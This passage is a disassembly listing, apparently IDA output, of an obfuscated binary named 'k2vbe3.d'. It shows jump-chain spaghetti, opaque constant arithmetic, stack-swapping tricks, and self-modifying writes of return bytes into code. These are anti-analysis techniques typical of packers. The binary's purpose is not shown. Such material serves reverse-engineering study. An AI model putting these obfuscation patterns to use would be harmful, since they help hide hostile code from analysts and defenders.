loc_44AD87:				; CODE XREF: sub_44A0D7-CB06j
		jmp	loc_459533
; END OF FUNCTION CHUNK	FOR sub_44A0D7
; ---------------------------------------------------------------------------

loc_44AD8C:				; CODE XREF: k2vbe3.d:0044814Ej
		and	esi, 0A0A7BFF6h
		cmp	esi, 38512C58h
		jmp	loc_4548C5

; =============== S U B	R O U T	I N E =======================================



sub_44AD9D	proc near		; CODE XREF: sub_417ADF+1Dp
					; sub_417BB2+1Bp
					; DATA XREF: ...

; FUNCTION CHUNK AT 004400FF SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004491FF SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004573D0 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004595B2 SIZE 00000005 BYTES

		jns	loc_4573D0
		call	sub_45512F

loc_44ADA8:				; CODE XREF: k2vbe3.d:00451BEFj
		jmp	loc_4491FF
sub_44AD9D	endp

; ---------------------------------------------------------------------------

loc_44ADAD:				; CODE XREF: k2vbe3.d:00446B14j
		jmp	sub_456FED
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_44ADB2:				; CODE XREF: sub_44D0D5-5AD6j
		cmp	ebp, 4A3CE9A2h
		jmp	loc_448D59
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_44ADBD:				; CODE XREF: sub_454E69+6D5Bj
		pop	esi
		mov	eax, [ebp-24h]
		movzx	eax, word ptr [eax]

loc_44ADC4:				; CODE XREF: sub_44BB4B:loc_458ACEj
		and	eax, 0FFFF7FFFh
		jmp	loc_43EF60
; END OF FUNCTION CHUNK	FOR sub_454E69
; ---------------------------------------------------------------------------
		ror	edx, 16h
		jmp	loc_44FF2E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4401FF

loc_44ADD6:				; CODE XREF: sub_4401FF:loc_446EA1j
		jnz	loc_44C28D
		jmp	loc_455814
; END OF FUNCTION CHUNK	FOR sub_4401FF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D298

loc_44ADE1:				; CODE XREF: sub_44D298:loc_458416j
		mov	esp, ebp
		xchg	ecx, [esp+0]

loc_44ADE6:				; CODE XREF: sub_44D59D:loc_444DCAj
		mov	ebp, ecx
		pop	ecx
		retn	8
; END OF FUNCTION CHUNK	FOR sub_44D298

; =============== S U B	R O U T	I N E =======================================



sub_44ADEC	proc near		; CODE XREF: sub_43F7AC-1E07p
					; k2vbe3.d:0043DB37p ...
		push	offset loc_44E6E1
		jmp	loc_448391
sub_44ADEC	endp

; ---------------------------------------------------------------------------

loc_44ADF6:				; CODE XREF: k2vbe3.d:0043DDCEj
		add	eax, [esp]
		adc	edx, [esp+4]
		add	esp, 8
		mov	eax, [eax]
		jmp	loc_44115C
; ---------------------------------------------------------------------------

loc_44AE07:				; CODE XREF: k2vbe3.d:00450568j
		add	edi, 0E5222DA4h
		jmp	loc_45BA0F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_44AE12:				; CODE XREF: sub_440C94:loc_447D60j
		push	offset loc_459637
		jmp	nullsub_119
; END OF FUNCTION CHUNK	FOR sub_440C94

; =============== S U B	R O U T	I N E =======================================



sub_44AE1C	proc near		; DATA XREF: k2vbe3.d:loc_43FC80o

; FUNCTION CHUNK AT 00459D99 SIZE 00000005 BYTES

		add	esp, 0FFFFFFCCh
		lea	eax, nullsub_20
		mov	byte ptr [eax],	0C3h
		mov	[ebp-4], eax
		push	1Ch
		lea	eax, [ebp-34h]
		push	offset loc_43E60A
		jmp	loc_459D99
sub_44AE1C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450CE7

loc_44AE3A:				; CODE XREF: sub_450CE7+5j
		push	7FCCEE99h
		pop	esi
		add	esi, 0A783F5C8h
		rol	esi, 0Bh
		xor	esi, 7C63B3C7h
		rol	esi, 0Ch
; END OF FUNCTION CHUNK	FOR sub_450CE7
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44AE52:				; CODE XREF: sub_45A323:loc_44FE77j
		add	esi, 0F495244Ah
		jmp	loc_4438EE
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451222

loc_44AE5D:				; CODE XREF: sub_451222:loc_43C533j
		call	sub_43D45F

loc_44AE62:				; CODE XREF: k2vbe3.d:00456B19j
		jmp	loc_451AB6
; END OF FUNCTION CHUNK	FOR sub_451222
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44803D

loc_44AE67:				; CODE XREF: sub_44803D-79CCj
		push	offset loc_450FDC
		jmp	nullsub_67
; END OF FUNCTION CHUNK	FOR sub_44803D
; ---------------------------------------------------------------------------
		jmp	ds:dword_41E05C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_44AE77:				; CODE XREF: sub_43CCD0+1BBC4j
		jmp	loc_45763F
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_406. PRESS KEYPAD	"+" TO EXPAND]
		align 2
		dw 0FFFAh
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4437D3

loc_44AE81:				; CODE XREF: sub_4437D3+10310j
		jmp	loc_44D333
; END OF FUNCTION CHUNK	FOR sub_4437D3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44AE86:				; CODE XREF: sub_45A323-1BC8Ej
		jmp	loc_443827
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447664

loc_44AE8B:				; CODE XREF: sub_447664-756Aj
		jnz	loc_456E5B

loc_44AE91:				; CODE XREF: k2vbe3.d:004415A4j
		jmp	nullsub_276
; END OF FUNCTION CHUNK	FOR sub_447664
; ---------------------------------------------------------------------------
		cdq
		sub	ebp, 0ED9DE2A2h
		xor	edx, ebp
		add	eax, esi
		jmp	loc_456E59
; ---------------------------------------------------------------------------

loc_44AEA6:				; DATA XREF: k2vbe3.d:loc_45B22Bo
		xchg	ebp, [esp]
		call	sub_44A79B

loc_44AEAE:				; CODE XREF: k2vbe3.d:00452C6Dj
		test	eax, eax
		jz	loc_4569E3
		jmp	loc_44A380
; ---------------------------------------------------------------------------

loc_44AEBB:				; CODE XREF: k2vbe3.d:00459890j
		rol	esi, 0Ch
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_44AEBE:				; CODE XREF: sub_44B912:loc_459874j
		xor	ecx, 0AECDB8DEh
		add	eax, ecx
		pop	ecx
		push	eax
		mov	eax, [ebp+8]
		push	eax
		call	sub_44C1BD
		jmp	loc_442529
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444297

loc_44AED6:				; CODE XREF: sub_444297:loc_444816j
					; sub_444297+14325j
		push	offset loc_4473B6
		jmp	nullsub_379
; END OF FUNCTION CHUNK	FOR sub_444297
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455C7A

loc_44AEE0:				; CODE XREF: sub_455C7A:loc_44D976j
		pop	edx
		and	edx, 72F30503h
		sub	edx, 67F10EADh
		add	edx, 0EC2C126Fh
		xor	eax, edx
		pop	edx
		jmp	loc_447748
; END OF FUNCTION CHUNK	FOR sub_455C7A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AA0B

loc_44AEFB:				; CODE XREF: sub_45AA0Bj
		mov	eax, ds:dword_458F08
		jmp	loc_458AEB
; END OF FUNCTION CHUNK	FOR sub_45AA0B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_29. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B029

loc_44AF07:				; CODE XREF: sub_45B029+13j
		jmp	loc_4429E3
; END OF FUNCTION CHUNK	FOR sub_45B029

; =============== S U B	R O U T	I N E =======================================



sub_44AF0C	proc near		; CODE XREF: k2vbe3.d:0044645Bj
					; k2vbe3.d:loc_448199p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00443E0D SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		xchg	edi, [esp-4+arg_0]
		jmp	loc_443E0D
sub_44AF0C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jge	loc_441CB2
		jmp	loc_456879
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DAF6

loc_44AF23:				; CODE XREF: sub_44DAF6:loc_44174Cj
		add	edx, 4811F150h
		add	edx, ebp
		add	edx, 37E40E6Bh
; END OF FUNCTION CHUNK	FOR sub_44DAF6
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_44AF31:				; CODE XREF: sub_43DFE1+C10Cj
		mov	edx, [edx]
		jmp	loc_45A3C9
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456D32

loc_44AF38:				; CODE XREF: sub_456D32+Aj
		push	eax
; END OF FUNCTION CHUNK	FOR sub_456D32
; START	OF FUNCTION CHUNK FOR sub_4582DD

loc_44AF39:				; CODE XREF: sub_4582DD-1C0C5j
		mov	eax, [ebp-18h]
		add	eax, eax
		cdq
		add	eax, [esp+8+var_8]
		adc	edx, [esp+8+var_4]
		add	esp, 8
		jmp	loc_44F75D
; END OF FUNCTION CHUNK	FOR sub_4582DD
; ---------------------------------------------------------------------------

loc_44AF4E:				; CODE XREF: k2vbe3.d:00453415j
		jno	loc_44CD8A

; =============== S U B	R O U T	I N E =======================================



sub_44AF54	proc near		; CODE XREF: sub_43FE2A:loc_449DB0p

; FUNCTION CHUNK AT 0044108B SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00454786 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		or	ecx, ecx
		jmp	loc_454786
sub_44AF54	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_44AF5F:				; CODE XREF: k2vbe3.d:00457491j
		retn
; ---------------------------------------------------------------------------

locret_44AF60:				; CODE XREF: k2vbe3.d:00455361j
		retn
; ---------------------------------------------------------------------------

loc_44AF61:				; CODE XREF: k2vbe3.d:0044F7A7j
		jmp	nullsub_475
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44AF66:				; CODE XREF: sub_45A323:loc_43E5D3j
		jmp	loc_446421
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
		mov	edx, 0E996F72Eh
		push	ecx
		call	sub_44E647
		ja	sub_449067
		jmp	sub_4535BC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451EEA

loc_44AF81:				; CODE XREF: sub_451EEA-1575Dj
		jz	loc_451FB5
		js	loc_44AD58

loc_44AF8D:				; CODE XREF: sub_451EEA:loc_458214j
		mov	eax, [ebp-4]
		mov	eax, [eax]
		jmp	loc_4525DA
; END OF FUNCTION CHUNK	FOR sub_451EEA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_44AF97:				; CODE XREF: sub_44ED3C:loc_44BE99j
		cmp	byte ptr [ebp-5], 0
		jnz	loc_446C00
		jmp	loc_4582C6
; END OF FUNCTION CHUNK	FOR sub_44ED3C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445F6E

loc_44AFA6:				; CODE XREF: sub_445F6E+1066j
		jnz	loc_44B5FB
; END OF FUNCTION CHUNK	FOR sub_445F6E
; START	OF FUNCTION CHUNK FOR sub_449B8B

loc_44AFAC:				; CODE XREF: sub_449B8B+19j
		jmp	loc_446786
; END OF FUNCTION CHUNK	FOR sub_449B8B
; ---------------------------------------------------------------------------
		mov	eax, ebp
		mov	edi, [ebx]
		adc	ecx, 0F3338375h
		jmp	loc_44B5F9
; ---------------------------------------------------------------------------

loc_44AFC0:				; DATA XREF: k2vbe3.d:00442204o
		call	sub_44AFD4
		pop	eax
		cmp	dword ptr [eax], 0
		jnz	loc_45ACF4
		jmp	loc_441C45

; =============== S U B	R O U T	I N E =======================================



sub_44AFD4	proc near		; CODE XREF: k2vbe3.d:0044A26Dp
					; k2vbe3.d:loc_44AFC0p	...

; FUNCTION CHUNK AT 0043C296 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004507FC SIZE 00000010 BYTES

		jnz	sub_454234
		call	sub_442DF0

loc_44AFDF:				; CODE XREF: sub_453F17:loc_45873Fj
		jmp	loc_43C296
sub_44AFD4	endp

; ---------------------------------------------------------------------------

loc_44AFE4:				; CODE XREF: k2vbe3.d:loc_447DD9j
		pop	ebp
		mov	eax, ds:dword_44BCFC
		or	eax, eax
		jnz	loc_443120

loc_44AFF3:				; CODE XREF: k2vbe3.d:loc_4420E9j
		jmp	loc_452B35
; ---------------------------------------------------------------------------
		sub	ecx, 0DC160FE1h
		jmp	sub_453521
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AD42

loc_44B003:				; CODE XREF: sub_45AD42-8137j
		add	eax, 9F2E951Ah
		mov	eax, [eax]
		popf
		push	0BD75E97Ch
		pop	ecx
		jmp	loc_444889
; END OF FUNCTION CHUNK	FOR sub_45AD42
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B870

loc_44B017:				; CODE XREF: sub_44B870:loc_45B381j
		jnz	loc_457556
		jmp	loc_447A8E
; END OF FUNCTION CHUNK	FOR sub_44B870
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_100. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4530B2

loc_44B023:				; CODE XREF: sub_4530B2+10j
		jmp	loc_4410D4
; END OF FUNCTION CHUNK	FOR sub_4530B2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443EF6

loc_44B028:				; CODE XREF: sub_443EF6+E0E7j
		jmp	sub_4436CE
; END OF FUNCTION CHUNK	FOR sub_443EF6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E00F

loc_44B02D:				; CODE XREF: sub_44E00F:loc_4441B1j
		jge	loc_4446C7

loc_44B033:				; CODE XREF: sub_4431FE+15F82j
		jmp	loc_453DE7
; END OF FUNCTION CHUNK	FOR sub_44E00F
; ---------------------------------------------------------------------------
		adc	edx, ecx
		jmp	loc_43FC5F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_44B03F:				; CODE XREF: sub_43F7AC:loc_4543A9j
		call	sub_44B495

loc_44B044:				; CODE XREF: k2vbe3.d:004538F6j
		jmp	loc_44BBAA
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; ---------------------------------------------------------------------------

loc_44B049:				; CODE XREF: k2vbe3.d:0043EC62j
		jmp	loc_44DA08
; ---------------------------------------------------------------------------

loc_44B04E:				; CODE XREF: k2vbe3.d:0043C224j
		jmp	loc_44E244
; ---------------------------------------------------------------------------

loc_44B053:				; DATA XREF: sub_457A58-BBCCo
		mov	ds:off_41E1AC, eax
		lea	eax, loc_4596BD
		mov	byte ptr [eax],	0C3h
		jmp	loc_4596BD

; =============== S U B	R O U T	I N E =======================================



sub_44B067	proc near		; CODE XREF: sub_413F36j sub_44B067+5j
					; DATA XREF: ...
		call	sub_449774
		jmp	ds:off_41E1B0
sub_44B067	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_44B072:				; CODE XREF: sub_44B912-93E5j
		mov	eax, 0B0h
		call	sub_450F04
		test	al, al
		jz	loc_44E57C
		jmp	loc_456962
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------
		jnb	loc_4529D6
		jmp	sub_4524DE
; ---------------------------------------------------------------------------

loc_44B094:				; CODE XREF: k2vbe3.d:00440509j
		call	sub_4444EC

loc_44B099:				; CODE XREF: k2vbe3.d:00453EB6j
		jmp	loc_440C3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B870

loc_44B09E:				; CODE XREF: sub_44B870+10j
		jmp	loc_446CFA
; END OF FUNCTION CHUNK	FOR sub_44B870
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45530F

loc_44B0A3:				; CODE XREF: sub_45530F-C1E4j
		jmp	sub_4479A1
; END OF FUNCTION CHUNK	FOR sub_45530F
; ---------------------------------------------------------------------------
		test	ebp, 6EB62C00h
		jmp	loc_44CA6D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451759

loc_44B0B3:				; CODE XREF: sub_451759:loc_45A167j
		add	edx, 29D4BD9Dh
		mov	edx, [edx]
		or	edx, edx
		jnz	loc_44D254
		jmp	loc_457B54
; END OF FUNCTION CHUNK	FOR sub_451759
; ---------------------------------------------------------------------------
		cdq
		jmp	loc_44422E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D0A9

loc_44B0CE:				; CODE XREF: sub_43D0A9:loc_448B18j
		call	sub_447D2E

loc_44B0D3:				; CODE XREF: k2vbe3.d:loc_4465D9j
					; k2vbe3.d:0045BAD2j
		jmp	nullsub_63
; END OF FUNCTION CHUNK	FOR sub_43D0A9
; ---------------------------------------------------------------------------

loc_44B0D8:				; CODE XREF: k2vbe3.d:00457DFEj
		jmp	loc_4435C8
; ---------------------------------------------------------------------------

loc_44B0DD:				; CODE XREF: k2vbe3.d:0045441Cj
		jmp	locret_4479C4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DCF5

loc_44B0E2:				; CODE XREF: sub_44DCF5-8E1j
		and	edi, edx
		add	ebx, eax
		jmp	loc_455177
; END OF FUNCTION CHUNK	FOR sub_44DCF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_44B0EB:				; CODE XREF: sub_450F71-49CDj
					; sub_450F71+19j
		mov	eax, [ebp-20h]
		push	esi
		push	568FA6C0h
		pop	esi
		and	esi, 3635E65Ah
		add	esi, 0E12459DBh
		jmp	loc_44BD70
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B454

loc_44B106:				; CODE XREF: sub_45B454+Dj
		jnz	loc_44540D
		jmp	loc_45A8E5
; END OF FUNCTION CHUNK	FOR sub_45B454
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441409

loc_44B111:				; CODE XREF: sub_441409-411Ej
		jns	loc_448B7A

loc_44B117:				; CODE XREF: k2vbe3.d:loc_43D9CAj
		and	esi, 5EA0A870h
		add	esi, 0AC24C3DCh
		xchg	esi, [esp+0]
		jmp	loc_45890A
; END OF FUNCTION CHUNK	FOR sub_441409
; ---------------------------------------------------------------------------
		pushf
		cdq
		jmp	sub_457580
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_204. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45282D

loc_44B133:				; CODE XREF: sub_45282D:loc_43ED6Cj
		xchg	ebp, [esi]
		test	ebp, edx
		jmp	loc_441F50
; END OF FUNCTION CHUNK	FOR sub_45282D
; ---------------------------------------------------------------------------

loc_44B13C:				; CODE XREF: k2vbe3.d:00457A75j
		mov	edx, ds:dword_4563F4
		or	edx, edx
		jnz	loc_4563E2
		jmp	loc_458931
; ---------------------------------------------------------------------------
		sbb	eax, esi
		or	esi, 0BB2ED807h
		jmp	sub_454E69

; =============== S U B	R O U T	I N E =======================================



sub_44B15C	proc near		; CODE XREF: k2vbe3.d:loc_4474A8j
					; sub_45512F-B60Ep ...

; FUNCTION CHUNK AT 0043C529 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		call	sub_451759
		push	ebx
		push	offset loc_444E21

loc_44B16B:				; CODE XREF: k2vbe3.d:00447334j
		jmp	loc_43C529
sub_44B15C	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44B170	proc near		; DATA XREF: sub_45783B+Do
		add	ecx, 0C424EC07h
		xchg	ecx, [esp+0]
		jmp	sub_4553CC
sub_44B170	endp

; ---------------------------------------------------------------------------

loc_44B17E:				; CODE XREF: k2vbe3.d:004573F4j
		jbe	loc_43D9F1
		cmp	edx, ebp
		jmp	loc_454B7A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446964

loc_44B18B:				; CODE XREF: sub_446964+5894j
		not	eax
		mov	[esi], edx
		jmp	loc_44054D
; END OF FUNCTION CHUNK	FOR sub_446964

; =============== S U B	R O U T	I N E =======================================



sub_44B194	proc near		; DATA XREF: sub_44B2D7:loc_4444DCo

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043E0CD SIZE 00000005 BYTES

		push	eax
		push	2FF2F1F1h
		pop	eax
		xor	eax, 1881722h
		add	eax, 0D1C90B0Fh
		xchg	eax, [esp+4+var_4]
		jmp	loc_43E0CD
sub_44B194	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_44B1AF:				; CODE XREF: sub_4424CF+55j
					; sub_4424CF:loc_4529F7j
		call	sub_44128B
		mov	edx, 9E99B23Eh
		call	sub_45B20A
		push	eax
		ror	eax, 0Eh
		push	edi
		push	94829477h
		jmp	loc_4518C9
; END OF FUNCTION CHUNK	FOR sub_4424CF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_202. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458DAF

loc_44B1CE:				; CODE XREF: sub_458DAF-5266j
		jmp	loc_44143A
; END OF FUNCTION CHUNK	FOR sub_458DAF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D31B

loc_44B1D3:				; CODE XREF: sub_43D31B+B497j
		jmp	loc_44EAFD
; END OF FUNCTION CHUNK	FOR sub_43D31B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443A30

loc_44B1D8:				; CODE XREF: sub_443A30+6j
		jmp	loc_44A4AE
; END OF FUNCTION CHUNK	FOR sub_443A30
; ---------------------------------------------------------------------------

loc_44B1DD:				; CODE XREF: k2vbe3.d:loc_456D0Bj
		jl	loc_45113A
; START	OF FUNCTION CHUNK FOR sub_44416D

loc_44B1E3:				; CODE XREF: sub_44416D+C37Aj
		jmp	nullsub_102
; END OF FUNCTION CHUNK	FOR sub_44416D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_44B1E8:				; CODE XREF: sub_43CCD0+D72Dj
		jmp	loc_44A804
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
		cmp	esi, 0B13F2BA9h
		jmp	loc_4434E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452D37

loc_44B1F8:				; CODE XREF: sub_452D37:loc_43FBBBj
		pop	edx
		call	sub_44A1FD

loc_44B1FE:				; CODE XREF: sub_44EADF+Ej
		jmp	loc_452F9C
; END OF FUNCTION CHUNK	FOR sub_452D37
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DF16

loc_44B203:				; CODE XREF: sub_44DF16:loc_43DAABj
					; sub_454FA8-1042Bj
		jmp	loc_447F47
; END OF FUNCTION CHUNK	FOR sub_44DF16

; =============== S U B	R O U T	I N E =======================================



sub_44B208	proc near		; CODE XREF: sub_43E0F5+7p
					; k2vbe3.d:0044BF0Bj

; FUNCTION CHUNK AT 00440E58 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00442875 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E6C9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044EFA8 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045127F SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00457C50 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx

loc_44B20C:				; CODE XREF: k2vbe3.d:loc_45BEFBj
		mov	ebp, esp
		push	ecx
		jmp	loc_442875
sub_44B208	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BA45

loc_44B214:				; CODE XREF: sub_45BA45:loc_452030j
		xchg	ebx, [esp+0]
		jmp	sub_43C04E
; END OF FUNCTION CHUNK	FOR sub_45BA45
; ---------------------------------------------------------------------------
		adc	edx, edi
		jz	loc_4526FA
		jmp	sub_441AE3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454FA8

loc_44B229:				; CODE XREF: sub_454FA8-1270Aj
		jz	loc_450AE3
		jmp	loc_45735F
; END OF FUNCTION CHUNK	FOR sub_454FA8
; ---------------------------------------------------------------------------
		xchg	ebp, [esp]
		mov	ecx, ebp
		pop	ebp
		pop	ebp
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454447

loc_44B23C:				; CODE XREF: sub_454447-6F1j
		jmp	loc_4400BA
; END OF FUNCTION CHUNK	FOR sub_454447
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCB3

loc_44B241:				; CODE XREF: sub_43CCB3+Fj
		jmp	loc_43F445
; END OF FUNCTION CHUNK	FOR sub_43CCB3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_480. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447ADA

loc_44B247:				; CODE XREF: sub_447ADA+Aj
		jmp	nullsub_511
; END OF FUNCTION CHUNK	FOR sub_447ADA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DA0B

loc_44B24C:				; CODE XREF: sub_43DA0B+Ej
		jmp	loc_440B5B
; END OF FUNCTION CHUNK	FOR sub_43DA0B

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44B251	proc near		; DATA XREF: sub_448F78-1130o

; FUNCTION CHUNK AT 00447B83 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		jmp	loc_447B83
sub_44B251	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_44B259:				; CODE XREF: sub_449372-9BD7j
		add	ecx, 4250C8DDh
		jns	loc_44B513
		popf
		adc	eax, ebp
		shr	esi, 14h
		jnp	loc_44039B
		jmp	loc_44B510
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444EFA

loc_44B276:				; CODE XREF: sub_443A30:loc_43FFC1j
					; sub_444EFA:loc_446BE6j
		xor	esi, 27B5DF4Ah
		jmp	loc_44BDB1
; END OF FUNCTION CHUNK	FOR sub_444EFA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A252

loc_44B281:				; CODE XREF: sub_45A252-1C2E4j
		mov	esi, ebx

loc_44B283:				; CODE XREF: sub_45A252:loc_445362j
		push	offset loc_451FF4
		jmp	nullsub_367
; END OF FUNCTION CHUNK	FOR sub_45A252
; ---------------------------------------------------------------------------

loc_44B28D:				; CODE XREF: k2vbe3.d:0044479Aj
		push	ecx
		push	0E6E50754h
		xchg	esi, [esp]
		mov	ecx, esi
		pop	esi
		rol	ecx, 1Dh
		and	ecx, 78713587h
		jmp	loc_4515B4
; ---------------------------------------------------------------------------

loc_44B2A7:				; DATA XREF: sub_440F92:loc_43F7A2o
		push	eax
		lea	eax, dword_447994
		push	eax
		push	eax
		mov	edx, eax
		push	eax
		push	0F0975758h
		pop	eax
		jmp	loc_44CD57
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_44B2BE:				; CODE XREF: sub_44B912:loc_443D49j
					; k2vbe3.d:loc_4535D3j
		test	ebx, 2860C5CCh
		jmp	loc_448912
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------

locret_44B2C9:				; CODE XREF: k2vbe3.d:loc_45B873j
		retn
; ---------------------------------------------------------------------------

loc_44B2CA:				; CODE XREF: k2vbe3.d:004451F2j
		xchg	ecx, ebx
		jmp	sub_45301F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_495. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440621

loc_44B2D2:				; CODE XREF: sub_440621+4184j
		jmp	nullsub_364
; END OF FUNCTION CHUNK	FOR sub_440621

; =============== S U B	R O U T	I N E =======================================



sub_44B2D7	proc near		; CODE XREF: sub_44FBB2:loc_43CE62j
					; k2vbe3.d:0043ED88j ...

var_14		= dword	ptr -14h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C6BC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043EAAF SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043EB6A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043EE16 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00440E2B SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004444DC SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004455A8 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00447398 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004473CB SIZE 00000006 BYTES
